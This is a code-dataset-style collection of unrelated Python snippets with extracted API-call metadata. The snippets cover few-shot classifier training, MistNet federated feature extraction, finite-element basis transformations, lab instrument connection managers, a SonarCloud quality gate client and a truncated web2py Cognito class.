def _compute_features_with_split_batch(self, images, grad_indices, no_grad_indices, meta_learning_state):
num_images = images.size(0)
if self.feature_cache is None: # cache the part with no gradients
features = []
num_batches = self._get_number_of_batches(num_images)
for batch in range(num_batches):
batch_start_index, batch_end_index = self._get_batch_indices(batch, num_images)
torch.set_grad_enabled(False)
features.append(self.model.get_context_features(images[batch_start_index: batch_end_index],
meta_learning_state))
self.feature_cache = torch.vstack(features).to(self.device)
# now select some random images for that will have gradients and process those
embeddings = []
if len(grad_indices) > 0:
torch.set_grad_enabled(True)
embeddings.append(self.model.get_context_features(images[grad_indices], meta_learning_state))
# now add in the no_grad images
embeddings.extend(self.feature_cache[no_grad_indices])
return torch.vstack(embeddings)
def prepare_task(self, task_dict):
context_images_np, context_labels_np = task_dict['context_images'], task_dict['context_labels']
target_images_np, target_labels_np = task_dict['target_images'], task_dict['target_labels']
context_images_np = context_images_np.transpose([0, 3, 1, 2])
context_images_np, context_labels_np = shuffle(context_images_np, context_labels_np)
context_images = torch.from_numpy(context_images_np)
context_labels = torch.from_numpy(context_labels_np)
target_images_np = target_images_np.transpose([0, 3, 1, 2])
target_images_np, target_labels_np = shuffle(target_images_np, target_labels_np)
target_images = torch.from_numpy(target_images_np)
target_labels = torch.from_numpy(target_labels_np)
context_images = context_images.to(self.device)
target_images = target_images.to(self.device)
context_labels = context_labels.to(self.device)
target_labels = target_labels.type(torch.LongTensor).to(self.device)
return context_images, target_images, context_labels, target_labels
def save_checkpoint(self, iteration):
torch.save({
'iteration': iteration,
'model_state_dict': self.model.state_dict(),
'optimizer_state_dict': self.optimizer.state_dict(),
'best_accuracy': self.validation_accuracies.get_current_best_accuracy_dict(),
}, os.path.join(self.log_files.checkpoint_dir, 'checkpoint.pt'))
def load_checkpoint(self):
checkpoint = torch.load(os.path.join(self.log_files.checkpoint_dir, 'checkpoint.pt'))
self.start_iteration = checkpoint['iteration']
self.model.load_state_dict(checkpoint['model_state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
self.validation_accuracies.replace(checkpoint['best_accuracy'])
if __name__ == "__main__":
main()
| [
"torch.from_numpy",
"numpy.array",
"torch.cuda.is_available",
"utils.ValidationAccuracies",
"torch.set_grad_enabled",
"argparse.ArgumentParser",
"utils.LogFiles",
"dataset.get_dataset_reader",
"tf_dataset_reader.TfDatasetReader",
"utils.shuffle",
"numpy.random.permutation",
"torch.Tensor",
"... | [((597, 729), 'utils.LogFiles', 'LogFiles', (['self.args.checkpoint_dir', 'self.args.resume_from_checkpoint', "(self.args.mode == 'test' or self.args.mode == 'test_vtab')"], {}), "(self.args.checkpoint_dir, self.args.resume_from_checkpoint, self.\n args.mode == 'test' or self.args.mode == 'test_vtab')\n", (605, 729), False, 'from utils import Logger, LogFiles, ValidationAccuracies, cross_entropy_loss, compute_accuracy, MetaLearningState, shuffle\n'), ((785, 828), 'utils.Logger', 'Logger', (['self.args.checkpoint_dir', '"""log.txt"""'], {}), "(self.args.checkpoint_dir, 'log.txt')\n", (791, 828), False, 'from utils import Logger, LogFiles, ValidationAccuracies, cross_entropy_loss, compute_accuracy, MetaLearningState, shuffle\n'), ((1951, 1992), 'utils.ValidationAccuracies', 'ValidationAccuracies', (['self.validation_set'], {}), '(self.validation_set)\n', (1971, 1992), False, 'from utils import Logger, LogFiles, ValidationAccuracies, cross_entropy_loss, compute_accuracy, MetaLearningState, shuffle\n'), ((2941, 2966), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2964, 2966), False, 'import argparse\n'), ((11198, 11233), 'numpy.random.permutation', 'np.random.permutation', (['context_size'], {}), '(context_size)\n', (11219, 11233), True, 'import numpy as np\n'), ((11833, 11861), 'torch.set_grad_enabled', 'torch.set_grad_enabled', (['(True)'], {}), '(True)\n', (11855, 11861), False, 'import torch\n'), ((22682, 22704), 'torch.vstack', 'torch.vstack', (['features'], {}), '(features)\n', (22694, 22704), False, 'import torch\n'), ((23887, 23911), 'torch.vstack', 'torch.vstack', (['embeddings'], {}), '(embeddings)\n', (23899, 23911), False, 'import torch\n'), ((24274, 24319), 'utils.shuffle', 'shuffle', (['context_images_np', 'context_labels_np'], {}), '(context_images_np, context_labels_np)\n', (24281, 24319), False, 'from utils import Logger, LogFiles, ValidationAccuracies, cross_entropy_loss, compute_accuracy, MetaLearningState, shuffle\n'), ((24345, 24380), 'torch.from_numpy', 'torch.from_numpy', (['context_images_np'], {}), '(context_images_np)\n', (24361, 24380), False, 'import torch\n'), ((24406, 24441), 'torch.from_numpy', 'torch.from_numpy', (['context_labels_np'], {}), '(context_labels_np)\n', (24422, 24441), False, 'import torch\n'), ((24556, 24599), 'utils.shuffle', 'shuffle', (['target_images_np', 'target_labels_np'], {}), '(target_images_np, target_labels_np)\n', (24563, 24599), False, 'from utils import Logger, LogFiles, ValidationAccuracies, cross_entropy_loss, compute_accuracy, MetaLearningState, shuffle\n'), ((24624, 24658), 'torch.from_numpy', 'torch.from_numpy', (['target_images_np'], {}), '(target_images_np)\n', (24640, 24658), False, 'import torch\n'), ((24683, 24717), 'torch.from_numpy', 'torch.from_numpy', (['target_labels_np'], {}), '(target_labels_np)\n', (24699, 24717), False, 'import torch\n'), ((1318, 1443), 'dataset.get_dataset_reader', 'get_dataset_reader', ([], {'args': 'self.args', 'train_set': 'self.train_set', 'validation_set': 'self.validation_set', 'test_set': 'self.test_set'}), '(args=self.args, train_set=self.train_set, validation_set\n =self.validation_set, test_set=self.test_set)\n', (1336, 1443), False, 'from dataset import get_dataset_reader\n'), ((13181, 13196), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (13194, 13196), False, 'import torch\n'), ((15664, 15679), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (15677, 15679), False, 'import torch\n'), ((19485, 19500), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (19498, 19500), False, 'import torch\n'), ((23632, 23660), 'torch.set_grad_enabled', 'torch.set_grad_enabled', (['(True)'], {}), '(True)\n', (23654, 23660), False, 'import torch\n'), ((25362, 25422), 'os.path.join', 'os.path.join', (['self.log_files.checkpoint_dir', '"""checkpoint.pt"""'], {}), "(self.log_files.checkpoint_dir, 'checkpoint.pt')\n", (25374, 25422), False, 'import os\n'), ((25488, 25548), 'os.path.join', 'os.path.join', (['self.log_files.checkpoint_dir', '"""checkpoint.pt"""'], {}), "(self.log_files.checkpoint_dir, 'checkpoint.pt')\n", (25500, 25548), False, 'import os\n'), ((1036, 1061), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1059, 1061), False, 'import torch\n'), ((2218, 2291), 'model.FewShotClassifier', 'FewShotClassifier', ([], {'args': 'self.args', 'logger': 'self.logger', 'device': 'self.device'}), '(args=self.args, logger=self.logger, device=self.device)\n', (2235, 2291), False, 'from model import FewShotClassifier\n'), ((15632, 15648), 'torch.load', 'torch.load', (['path'], {}), '(path)\n', (15642, 15648), False, 'import torch\n'), ((18146, 18162), 'torch.load', 'torch.load', (['path'], {}), '(path)\n', (18156, 18162), False, 'import torch\n'), ((21618, 21645), 'torch.vstack', 'torch.vstack', (['target_logits'], {}), '(target_logits)\n', (21630, 21645), False, 'import torch\n'), ((21678, 21705), 'torch.hstack', 'torch.hstack', (['target_labels'], {}), '(target_labels)\n', (21690, 21705), False, 'import torch\n'), ((23178, 23207), 'torch.set_grad_enabled', 'torch.set_grad_enabled', (['(False)'], {}), '(False)\n', (23200, 23207), False, 'import torch\n'), ((19771, 19986), 'image_folder_reader.ImageFolderReader', 'ImageFolderReader', ([], {'path_to_images': 'self.args.download_path_for_sun397_dataset', 'context_batch_size': 'context_set_size', 'target_batch_size': 'self.args.batch_size', 'image_size': 'self.args.image_size', 'device': 'self.device'}), '(path_to_images=self.args.download_path_for_sun397_dataset,\n context_batch_size=context_set_size, target_batch_size=self.args.\n batch_size, image_size=self.args.image_size, device=self.device)\n', (19788, 19986), False, 'from image_folder_reader import ImageFolderReader\n'), ((20195, 20471), 'tf_dataset_reader.TfDatasetReader', 'TfDatasetReader', ([], {'dataset': "dataset['name']", 'task': "dataset['task']", 'context_batch_size': 'context_set_size', 'target_batch_size': 'self.args.batch_size', 'path_to_datasets': 'self.args.download_path_for_tensorflow_datasets', 'image_size': 'self.args.image_size', 'device': 'self.device'}), "(dataset=dataset['name'], task=dataset['task'],\n context_batch_size=context_set_size, target_batch_size=self.args.\n batch_size, path_to_datasets=self.args.\n download_path_for_tensorflow_datasets, image_size=self.args.image_size,\n device=self.device)\n", (20210, 20471), False, 'from tf_dataset_reader import TfDatasetReader\n'), ((23435, 23457), 'torch.vstack', 'torch.vstack', (['features'], {}), '(features)\n', (23447, 23457), False, 'import torch\n'), ((14537, 14564), 'torch.vstack', 'torch.vstack', (['target_logits'], {}), '(target_logits)\n', (14549, 14564), False, 'import torch\n'), ((16972, 16999), 'torch.vstack', 'torch.vstack', (['target_logits'], {}), '(target_logits)\n', (16984, 16999), False, 'import torch\n'), ((15126, 15146), 'numpy.array', 'np.array', (['accuracies'], {}), '(accuracies)\n', (15134, 15146), True, 'import numpy as np\n'), ((17612, 17632), 'numpy.array', 'np.array', (['accuracies'], {}), '(accuracies)\n', (17620, 17632), True, 'import numpy as np\n'), ((15200, 15220), 'numpy.array', 'np.array', (['accuracies'], {}), '(accuracies)\n', (15208, 15220), True, 'import numpy as np\n'), ((17695, 17715), 'numpy.array', 'np.array', (['accuracies'], {}), '(accuracies)\n', (17703, 17715), True, 'import numpy as np\n'), ((8606, 8626), 'torch.Tensor', 'torch.Tensor', (['losses'], {}), '(losses)\n', (8618, 8626), False, 'import torch\n'), ((8696, 8726), 'torch.Tensor', 'torch.Tensor', (['train_accuracies'], {}), '(train_accuracies)\n', (8708, 8726), False, 'import torch\n')] |
"""
The federated learning trainer for MistNet, used by both the client and the
server.
Reference:
<NAME>, et al. "MistNet: Towards Private Neural Network Training with Local
Differential Privacy," found in docs/papers.
"""
import time
import logging
import mindspore
import mindspore.dataset as ds
from plato.utils import unary_encoding
from plato.algorithms.mindspore import fedavg
import multiprocessing
from plato.config import Config
class Algorithm(fedavg.Algorithm):
"""The PyTorch-based MistNet algorithm, used by both the client and the
server.
"""
def extract_features(self, dataset, cut_layer, epsilon=None):
"""Extracting features using layers before the cut_layer.
dataset: The training or testing dataset.
cut_layer: Layers before this one will be used for extracting features.
epsilon: If epsilon is not None, local differential privacy should be
applied to the features extracted.
"""
self.model.set_train(False)
tic = time.perf_counter()
feature_dataset = []
for inputs, targets in dataset:
inputs = mindspore.Tensor(inputs)
targets = mindspore.Tensor(targets)
logits = self.model.forward_to(inputs, cut_layer)
if epsilon is not None:
logits = logits.asnumpy()
logits = unary_encoding.encode(logits)
logits = unary_encoding.randomize(logits, epsilon)
logits = mindspore.Tensor(logits.astype('float32'))
feature_dataset.append((logits, targets))
toc = time.perf_counter()
logging.info("[Client #%d] Features extracted from %s examples.",
self.client_id, len(feature_dataset))
logging.info("[Client #{}] Time used: {:.2f} seconds.".format(
self.client_id, toc - tic))
return feature_dataset
@staticmethod
def dataset_generator(trainset):
"""The generator used to produce a suitable Dataset for the MineSpore trainer."""
for i in range(len(trainset)): #[[image,[]],[]]
image = trainset[i][0]
annotation = trainset[i][1][0]
batch_y_true_0 = trainset[i][1][1]
batch_y_true_1=trainset[i][1][2]
batch_y_true_2 = trainset[i][1][3]
batch_gt_box0 = trainset[i][1][4]
batch_gt_box1 = trainset[i][1][5]
batch_gt_box2 = trainset[i][1][6]
img_hight = trainset[i][1][7]
img_width = trainset[i][1][8]
input_shape = trainset[i][1][9]
yield image,annotation, batch_y_true_0,batch_y_true_1,batch_y_true_2,batch_gt_box0,\
batch_gt_box1,batch_gt_box2,img_hight,img_width,input_shape
def train(self, trainset, *args):
column_out_names = ["image", "annotation", "batch_y_true_0", "batch_y_true_1", "batch_y_true_2",
"batch_gt_box0","batch_gt_box1", "batch_gt_box2", "img_hight", "img_width", "input_shape"]
data_size = len(trainset)
print('------data_size----: ', data_size, flush=True)
dataset= ds.GeneratorDataset(source=list(Algorithm.dataset_generator(trainset)), column_names=column_out_names)
num_parallel_workers = 1
per_batch_size = Config().trainer.per_batch_size
repeat_epoch = Config().trainer.repeat_epoch
group_size = Config().trainer.group_size
dataset = dataset.batch(per_batch_size, num_parallel_workers= num_parallel_workers,
drop_remainder=True)
dataset = dataset.repeat(repeat_epoch)
self.trainer.train(dataset, data_size, per_batch_size, repeat_epoch, group_size)
| [
"plato.utils.unary_encoding.encode",
"plato.utils.unary_encoding.randomize",
"time.perf_counter",
"plato.config.Config",
"mindspore.Tensor"
] | [((1030, 1049), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (1047, 1049), False, 'import time\n'), ((1617, 1636), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (1634, 1636), False, 'import time\n'), ((1142, 1166), 'mindspore.Tensor', 'mindspore.Tensor', (['inputs'], {}), '(inputs)\n', (1158, 1166), False, 'import mindspore\n'), ((1189, 1214), 'mindspore.Tensor', 'mindspore.Tensor', (['targets'], {}), '(targets)\n', (1205, 1214), False, 'import mindspore\n'), ((1382, 1411), 'plato.utils.unary_encoding.encode', 'unary_encoding.encode', (['logits'], {}), '(logits)\n', (1403, 1411), False, 'from plato.utils import unary_encoding\n'), ((1437, 1478), 'plato.utils.unary_encoding.randomize', 'unary_encoding.randomize', (['logits', 'epsilon'], {}), '(logits, epsilon)\n', (1461, 1478), False, 'from plato.utils import unary_encoding\n'), ((3312, 3320), 'plato.config.Config', 'Config', ([], {}), '()\n', (3318, 3320), False, 'from plato.config import Config\n'), ((3367, 3375), 'plato.config.Config', 'Config', ([], {}), '()\n', (3373, 3375), False, 'from plato.config import Config\n'), ((3418, 3426), 'plato.config.Config', 'Config', ([], {}), '()\n', (3424, 3426), False, 'from plato.config import Config\n')] |
import gem
from abc import ABCMeta, abstractmethod
try:
from firedrake_citations import Citations
Citations().add("Kirby2018zany", """
@Article{Kirby2018zany,
author = {<NAME>},
title = {A general approach to transforming finite elements},
journal = {SMAI Journal of Computational Mathematics},
year = 2018,
volume = 4,
pages = {197-224},
doi = {10.5802/smai-jcm.33},
archiveprefix ={arXiv},
eprint = {1706.09017},
primaryclass = {math.NA}
}
""")
Citations().add("Kirby2019zany", """
@Article{Kirby:2019,
author = {<NAME> and <NAME>},
title = {Code generation for generally mapped finite
elements},
journal = {ACM Transactions on Mathematical Software},
year = 2019,
volume = 45,
number = 41,
pages = {41:1--41:23},
doi = {10.1145/3361745},
archiveprefix ={arXiv},
eprint = {1808.05513},
primaryclass = {cs.MS}
}""")
Citations().add("Argyris1968", """
@Article{Argyris1968,
author = {<NAME> and <NAME> and <NAME>},
title = {{The TUBA family of plate elements for the matrix
displacement method}},
journal = {The Aeronautical Journal},
year = 1968,
volume = 72,
pages = {701-709},
doi = {10.1017/S000192400008489X}
}
""")
Citations().add("Bell1969", """
@Article{Bell1969,
author = {<NAME>},
title = {A refined triangular plate bending finite element},
journal = {International Journal for Numerical Methods in
Engineering},
year = 1969,
volume = 1,
number = 1,
pages = {101-122},
doi = {10.1002/nme.1620010108}
}
""")
Citations().add("Ciarlet1972", r"""
@Article{Ciarlet1972,
author = {<NAME> and <NAME>},
title = {{General Lagrange and Hermite interpolation in
$\mathbb{R}^n$ with applications to finite element
methods}},
journal = {Archive for Rational Mechanics and Analysis},
year = 1972,
volume = 46,
number = 3,
pages = {177-199},
doi = {10.1007/BF0025245}
}
""")
Citations().add("Morley1971", """
@Article{Morley1971,
author = {<NAME>},
title = {The constant-moment plate-bending element},
journal = {The Journal of Strain Analysis for Engineering
Design},
year = 1971,
volume = 6,
number = 1,
pages = {20-24},
doi = {10.1243/03093247V061020}
}
""")
except ImportError:
Citations = None
class PhysicallyMappedElement(metaclass=ABCMeta):
"""A mixin that applies a "physical" transformation to tabulated
basis functions."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if Citations is not None:
Citations().register("Kirby2018zany")
Citations().register("Kirby2019zany")
@abstractmethod
def basis_transformation(self, coordinate_mapping):
"""Transformation matrix for the basis functions.
:arg coordinate_mapping: Object providing physical geometry."""
pass
def basis_evaluation(self, order, ps, entity=None, coordinate_mapping=None):
assert coordinate_mapping is not None
M = self.basis_transformation(coordinate_mapping)
def matvec(table):
i, j = gem.indices(2)
val = gem.ComponentTensor(gem.IndexSum(M[i, j]*table[j], (j,)), (i,))
# Eliminate zeros
return gem.optimise.aggressive_unroll(val)
result = super().basis_evaluation(order, ps, entity=entity)
return {alpha: matvec(table)
for alpha, table in result.items()}
def point_evaluation(self, order, refcoords, entity=None):
raise NotImplementedError("TODO: not yet thought about it")
class PhysicalGeometry(metaclass=ABCMeta):
@abstractmethod
def cell_size(self):
"""The cell size at each vertex.
:returns: A GEM expression for the cell size, shape (nvertex, ).
"""
@abstractmethod
def jacobian_at(self, point):
"""The jacobian of the physical coordinates at a point.
:arg point: The point in reference space to evaluate the Jacobian.
:returns: A GEM expression for the Jacobian, shape (gdim, tdim).
"""
@abstractmethod
def reference_normals(self):
"""The (unit) reference cell normals for each facet.
:returns: A GEM expression for the normal to each
facet (numbered according to FIAT conventions), shape
(nfacet, tdim).
"""
@abstractmethod
def physical_normals(self):
"""The (unit) physical cell normals for each facet.
:returns: A GEM expression for the normal to each
facet (numbered according to FIAT conventions). These are
all computed by a clockwise rotation of the physical
tangents, shape (nfacet, gdim).
"""
@abstractmethod
def physical_tangents(self):
"""The (unit) physical cell tangents on each facet.
:returns: A GEM expression for the tangent to each
facet (numbered according to FIAT conventions). These
always point from low to high numbered local vertex, shape
(nfacet, gdim).
"""
@abstractmethod
def physical_edge_lengths(self):
"""The length of each edge of the physical cell.
:returns: A GEM expression for the length of each
edge (numbered according to FIAT conventions), shape
(nfacet, ).
"""
| [
"gem.optimise.aggressive_unroll",
"gem.indices",
"firedrake_citations.Citations",
"gem.IndexSum"
] | [((107, 118), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (116, 118), False, 'from firedrake_citations import Citations\n'), ((534, 545), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (543, 545), False, 'from firedrake_citations import Citations\n'), ((1008, 1019), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (1017, 1019), False, 'from firedrake_citations import Citations\n'), ((1396, 1407), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (1405, 1407), False, 'from firedrake_citations import Citations\n'), ((1785, 1796), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (1794, 1796), False, 'from firedrake_citations import Citations\n'), ((2248, 2259), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (2257, 2259), False, 'from firedrake_citations import Citations\n'), ((3482, 3496), 'gem.indices', 'gem.indices', (['(2)'], {}), '(2)\n', (3493, 3496), False, 'import gem\n'), ((3628, 3663), 'gem.optimise.aggressive_unroll', 'gem.optimise.aggressive_unroll', (['val'], {}), '(val)\n', (3658, 3663), False, 'import gem\n'), ((3535, 3573), 'gem.IndexSum', 'gem.IndexSum', (['(M[i, j] * table[j])', '(j,)'], {}), '(M[i, j] * table[j], (j,))\n', (3547, 3573), False, 'import gem\n'), ((2939, 2950), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (2948, 2950), False, 'from firedrake_citations import Citations\n'), ((2989, 3000), 'firedrake_citations.Citations', 'Citations', ([], {}), '()\n', (2998, 3000), False, 'from firedrake_citations import Citations\n')] |
from ..Simulation.Parameters import simLevel, isSimulation
from ..utils.misc import singleton
from telnetlib import Telnet
import paramiko
import logging
logger = logging.getLogger(__name__)
# If it is a simulation, do not import pyvisa
try:
import pyvisa
except ImportError:
if isSimulation:
logger.log(simLevel, "In simulation mode, so no need to import pyvisa")
logger.warning("In simulation mode, equipment will return fake values!")
else:
logger.error("PyVISA is not installed. Equipment classes will not work!")
raise
class RealTelnetResourceManager(object):
Error = TimeoutError
def __init__(self):
self.connections = {}
def __del__(self):
for resource in self.connections:
self.connections[resource].close()
def open_resource(self, ip, port=23):
if (ip, port) in self.connections:
return self.connections[(ip, port)]
else:
self.connections[(ip, port)] = Telnet(ip, port=port)
return self.connections[(ip, port)]
class RealSSHResourceManager(object):
Error = TimeoutError
def __init__(self):
self.connections = {}
def __del__(self):
for resource in self.connections:
self.connections[resource].close()
def open_resource(self, ip, username, password):
if ip in self.connections:
return self.connections[(ip, username, password)]
else:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip, username=username, password=password)
self.connections[(ip, username, password)] = client
return self.connections[(ip, username, password)]
class SimulatedTelnetResourceManager:
Error = IOError
def open_resource(self, ip, port=23):
logger.log(simLevel, "Simulating an instrument at ip %s, port %d" % (ip, port))
return logger
class SimulatedSSHResourceManager:
Error = IOError
def open_resource(self, ip, username, password):
logger.log(simLevel, "Simulating an instrument at %s@%s" % (username,ip))
return logger
class SimulatedPyvisaResourceManager:
Error = IOError
def open_resource(self, port):
logger.log(simLevel, "Simulating an instrument at port %s" % str(port))
return logger
# If it is a simulation, return dummy resource managers
if isSimulation:
# override the pyvisa instrument write and query functions
def simulate_write(command):
logger.log(simLevel, "Writing %s" % repr(command))
def simulate_query(command):
logger.log(simLevel, "Querying %s" % repr(command))
return "1"
def simulate_read():
logger.log(simLevel, "Read 1")
return "root@jester:/# 1"
def simulate_close():
logger.log(simLevel, "Closing simulated instrument")
logger.write = simulate_write
logger.query = simulate_query
logger.read = simulate_read
logger.close = simulate_close
# create our fake pyvisa resource manager and VisaIOError
PyvisaResourceManager = SimulatedPyvisaResourceManager
VisaIOError = SimulatedPyvisaResourceManager.Error
# create our fake telnet resource manager
TelnetResourceManager = SimulatedTelnetResourceManager
TelnetIOError = SimulatedTelnetResourceManager.Error
# create our fake SSH resource manager
SSHResourceManager = SimulatedSSHResourceManager
SSHIOError = SimulatedSSHResourceManager.Error
else:
# singleton ensures that there only exists one reference to a resource manager
PyvisaResourceManager = singleton(pyvisa.ResourceManager)
VisaIOError = pyvisa.errors.VisaIOError
# only one reference to Telnet Resource Manager
TelnetResourceManager = singleton(RealTelnetResourceManager)
TelnetIOError = RealTelnetResourceManager.Error
# only one reference to SSH Resource Manager
SSHResourceManager = singleton(RealSSHResourceManager)
SSHIOError = RealSSHResourceManager.Error | [
"logging.getLogger",
"paramiko.SSHClient",
"paramiko.AutoAddPolicy",
"telnetlib.Telnet"
] | [((163, 190), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (180, 190), False, 'import logging\n'), ((899, 920), 'telnetlib.Telnet', 'Telnet', (['ip'], {'port': 'port'}), '(ip, port=port)\n', (905, 920), False, 'from telnetlib import Telnet\n'), ((1315, 1335), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (1333, 1335), False, 'import paramiko\n'), ((1374, 1398), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (1396, 1398), False, 'import paramiko\n')] |
import requests
import json
import logging
class PullRequestProfile :
'''
This class instantiates the Sonarcloud Quality Profile for a Pull Request from one SCM branch to another.
'''
def __init__(self, url="https://sonarcloud.io", **kwargs):
self.url = url
self.authorization = kwargs.get("authorization")
self.pullrequest = kwargs.get("pullrequest")
self.projectkey = kwargs.get("projectkey")
self.headers = {
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": self.authorization,
}
def gate_status(self):
'''
This method returns the quality gate status.
"0" is returned when the quality gate fails and '1' is returned when the quality gate passes. Both values are intergers.
'''
url = self.url + "/api/qualitygates/project_status"
headers = self.headers
params = {"projectKey": self.projectkey , "pullRequest": self.pullrequest}
resp = requests.get(url=url, headers=headers, params=params, auth=(self.authorization, ''))
if resp.status_code != 200:
raise Exception (':::: Response Code = {} ::::'.format(resp.status_code))
else:
data = []
j = resp.json()
s = j['projectStatus']['status']
k = {"status": "{}".format(s)}
data.append(k)
default_value = 'N/A'
for i in j['projectStatus']['conditions']:
c = {
"metric" : "{}".format(i.get('metricKey', default_value)),
"threshold" : "{}".format(i.get('errorThreshold', default_value)),
"value" : "{}".format(i.get('actualValue', default_value)),
"operator" : "{}".format(i.get('comparator', default_value))
}
data.append(c)
return data
def measure(self, metric):
'''
This method returns the Measure of specified metric.
Example of metric: coverage, code_smells, duplicated_lines_density, vulnerabilities
'''
url = self.url + "/api/measures/component"
headers = self.headers
params = {"component": self.projectkey , "pullRequest": self.pullrequest, 'metricKeys': metric}
resp = requests.get(url=url, headers=headers, params=params, auth=(self.authorization, ''))
if resp.status_code != 200:
raise Exception (':::: Response Code = {} ::::'.format(resp.status_code))
else:
data = resp.json()["component"]["measures"][0]["value"]
return data
def issues(self, status, page_size=100):
'''
This method returns issues with the specified status.
Example of status: OPEN, CLOSED, CONFIRMED, RESOLVED, REOPENED
'''
url = self.url + "/api/issues/search"
headers = self.headers
params = {"projects": self.projectkey , "pullRequest": self.pullrequest, 'statuses': status}
resp = requests.get(url=url, headers=headers, params=params, auth=(self.authorization, ''))
if resp.status_code != 200:
raise Exception (':::: Response Code = {} ::::'.format(resp.status_code))
else:
t = resp.json()["total"]
page_num = t//page_size
page_num += 1
data = []
for i in range(1,page_num+1):
params = {"projects": self.projectkey , "pullRequest": self.pullrequest, 'statuses': status, 'p': i, 'ps': page_size}
resp = requests.get(url=url, headers=headers, params=params, auth=(self.authorization, ''))
if resp.status_code != 200:
raise Exception (':::: Response Code = {} ::::'.format(resp.status_code))
else:
s = resp.json()["issues"]
for j in s:
data.append(j)
return data
def issues_info(self, issues):
'''
This method returns issue details to be reported.
'''
default_value = 'N/A'
data = []
for i in issues:
k = i.get('component')
j = k.split(':')[-1]
s = {'Associated Rule': '{}'.format(i.get('rule',default_value)), 'Component': '{}'.format(j), 'Message': '{}'.format(i.get('message',default_value)), 'Issue Type': '{}'.format(i.get('type', default_value)), 'Severity': '{}'.format(i.get('severity', default_value)), "Line": '{}'.format(i.get('line', default_value)), 'Estimated Effort': '{}'.format(i.get('effort', default_value)), 'Author': '{}'.format(i.get('author', default_value))}
data.append(s)
return data
| [
"requests.get"
] | [((1051, 1140), 'requests.get', 'requests.get', ([], {'url': 'url', 'headers': 'headers', 'params': 'params', 'auth': "(self.authorization, '')"}), "(url=url, headers=headers, params=params, auth=(self.\n authorization, ''))\n", (1063, 1140), False, 'import requests\n'), ((2346, 2435), 'requests.get', 'requests.get', ([], {'url': 'url', 'headers': 'headers', 'params': 'params', 'auth': "(self.authorization, '')"}), "(url=url, headers=headers, params=params, auth=(self.\n authorization, ''))\n", (2358, 2435), False, 'import requests\n'), ((3052, 3141), 'requests.get', 'requests.get', ([], {'url': 'url', 'headers': 'headers', 'params': 'params', 'auth': "(self.authorization, '')"}), "(url=url, headers=headers, params=params, auth=(self.\n authorization, ''))\n", (3064, 3141), False, 'import requests\n'), ((3593, 3682), 'requests.get', 'requests.get', ([], {'url': 'url', 'headers': 'headers', 'params': 'params', 'auth': "(self.authorization, '')"}), "(url=url, headers=headers, params=params, auth=(self.\n authorization, ''))\n", (3605, 3682), False, 'import requests\n')] |
#!/usr/bin/env python3
import os
import numpy as np
import sys
try:
import torch
except ImportError:
pass
from easypbr import *
from dataloaders import *
config_file="lnn_check_lattice_size.cfg"
config_path=os.path.join( os.path.dirname( os.path.realpath(__file__) ) , '../../config', config_file)
view=Viewer.create(config_path) #first because it needs to init context
loader=DataLoaderScanNet(config_path)
loader.start()
nr_points_in_radius=[]
while True:
if(loader.has_data()):
cloud=loader.get_cloud()
Scene.show(cloud, "cloud")
random_point=cloud.V[1,:]
# print("random point is ", random_point)
nr_points=cloud.radius_search(random_point, 0.05)
nr_points_in_radius.append(nr_points)
print("mean_nr_points: ", np.mean(nr_points_in_radius))
view.update() | [
"os.path.realpath",
"numpy.mean"
] | [((249, 275), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (265, 275), False, 'import os\n'), ((792, 820), 'numpy.mean', 'np.mean', (['nr_points_in_radius'], {}), '(nr_points_in_radius)\n', (799, 820), True, 'import numpy as np\n')] |
import os
import subprocess
import sys
args = sys.argv[:]
print('hello from %s' % args[0])
print('args: ' + ' '.join(args))
print('current directory: ' + os.getcwd())
p = subprocess.Popen('ls -al', shell=True, bufsize=1, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
while True:
line = p.stdout.readline()
if line != '':
print(line.rstrip())
else:
break
retval = p.wait()
print('%s done' % args[0])
| [
"subprocess.Popen",
"os.getcwd"
] | [((171, 299), 'subprocess.Popen', 'subprocess.Popen', (['"""ls -al"""'], {'shell': '(True)', 'bufsize': '(1)', 'universal_newlines': '(True)', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), "('ls -al', shell=True, bufsize=1, universal_newlines=True,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n", (187, 299), False, 'import subprocess\n'), ((154, 165), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (163, 165), False, 'import os\n')] |
# -*- coding: utf-8 -*-
from gluon import DAL, HTTP, Field, current
from gluon.contrib.appconfig import AppConfig
from gluon.tools import Auth
class Cognito(object):
def __init__(self):
self.db = DAL(
current.config.get("cognito_db.uri"),
pool_size=current.config.get("cognito_db.pool_size"),
migrate_enabled=current.config.get("cognito_db.migrate"),
check_reserved=["all"],
)
self.auth = Auth(db=self.db, host_names=current.config.get("host.names"))
self.auth.settings.create_user_groups = None
# TODO: extend this during implementation
self.auth.settings.extra_fields["auth_user"] = [
Field("user_attributes", type="json")
]
self.auth.define_tables(username=True, signature=True)
def add_user_to_group(self, username, group_name):
user = self.db(self.db.auth_user.username == username).select()
if not len(user):
raise HTTP(400, "UserNotFoundException")
group = self.db(self.db.auth_group.role == group_name).select()
if len(group):
